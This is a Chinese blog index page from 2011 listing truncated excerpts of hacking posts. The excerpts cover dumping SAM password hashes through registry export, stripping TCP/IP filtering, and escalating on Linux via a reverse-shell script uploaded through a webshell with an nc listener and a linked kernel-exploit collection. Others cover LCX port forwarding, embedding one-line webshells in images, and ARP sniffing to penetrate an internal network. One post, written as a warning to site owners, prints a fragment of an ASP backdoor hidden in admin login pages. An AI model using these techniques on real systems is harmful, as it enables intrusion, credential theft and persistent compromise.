2011年3月17日

Cmd 下目录的操作技巧

摘要: 列出d的所有目录:for /d %i in (d:\freehost\*) do @echo %i把当前路径下文件夹的名字只有1-3个字母的显示出来:for /d %i in (???) do @echo %i以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:for /r %i in (*.exe) do @echo %i以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出:for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i这个会显示a.txt里面的内容,因为/f的作用,会读出a. 阅读全文

posted @ 2011-03-17 03:59 =_=! 阅读(266) 评论(0) 推荐(0) 编辑

ethash 不免杀怎么获取本机 hash

摘要: 首先导出注册表:Windows 2000:regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"Windows 2003:reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg 注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略) 接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机, 阅读全文

posted @ 2011-03-17 03:51 =_=! 阅读(222) 评论(0) 推荐(0) 编辑

去除TCP/IP筛选

摘要: TCP/IP筛选在注册表里有三处,分别是:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TcpipHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TcpipHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip分别用以下命令来导出注册表项:regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpipregedit -e D:\b.reg 阅读全文

posted @ 2011-03-17 03:43 =_=! 阅读(252) 评论(0) 推荐(0) 编辑

linux溢出提权

摘要: 先在网站目录上传1.pl,是个反弹脚本Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0然后执行 ./1.pl 本机IP 1224接着本机监听nc -vv -l -p 1224,图1 反弹成功输入idbash-3.2$ iduid=529(zeicom) gid=525(zeicom) groups=525(zeicom)bash-3.2$这里uid=529(zeicom)还不是root权限,输入uname –r返回:2.6.18-164.11.1.el5PAE找对应的exp, 这里地址整理很齐全可以这里下http://bbs.tian6.com/linux_exp/in 阅读全文

posted @ 2011-03-17 03:00 =_=! 阅读(581) 评论(0) 推荐(0) 编辑

2011年3月10日

public权限也能列目录

该文被密码保护。 阅读全文

posted @ 2011-03-10 06:28 =_=! 阅读(0) 评论(0) 推荐(0) 编辑

XP搞内网的一个小技巧

摘要: XP搞内网的时候,LCX.exe转发出来到本机的端口,在mstsc里面连127.0.0.1是联不上去的,因为XP是单用户。各位可以在mstsc里连接:127.0.0.2 就能联上去了。 阅读全文

posted @ 2011-03-10 03:48 =_=! 阅读(174) 评论(0) 推荐(0) 编辑

2011年3月9日

隐藏在管理员登录页面的危险

摘要: 如果你的网站被入侵,你辛苦删掉以后,没好几天。又“病”了。建议你看看你的管理登录页面有没有类似下面这样的代码:<%if request.QueryString("action")="comeon" then a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f 阅读全文

posted @ 2011-03-09 20:00 =_=! 阅读(179) 评论(0) 推荐(0) 编辑

2011年2月28日

edjpgcom

摘要: 主要功能是能在图片里插入一句话马或者小马,伪造的比较好。界面如图:使用方法:把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可。 阅读全文

posted @ 2011-02-28 15:15 =_=! 阅读(1105) 评论(0) 推荐(0) 编辑

2011年2月27日

ARPSniffer获得最高权限

摘要: 假设想攻击的主机IP是:61.139.1.79 同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆 第一步: tracert 61.139.1.1 C:\WIN2000\system32>tracert 61.139.1.1 Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 30 hops: 1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1] Trace complete. 这就说明了你想攻击的主机和你所在的主机在一个关网中 阅读全文

posted @ 2011-02-27 13:59 =_=! 阅读(475) 评论(0) 推荐(0) 编辑

ARP监听渗透内网的方法

摘要: 假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已通过漏洞获得权限的主机IP是:61.139.1.88并可以3389登陆。第一步:tracert 61.139.1.1C:/WIN2000/system32>tracert 61.139.1.1Tracing route to HACK-4FJ7EARC [61.139.1.1]over a maximum of 30 hops:1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]Trace complete.这就说明了你想攻击的主机和你所在的主机在一个关网中那 阅读全文

posted @ 2011-02-27 10:46 =_=! 阅读(797) 评论(0) 推荐(0) 编辑

导航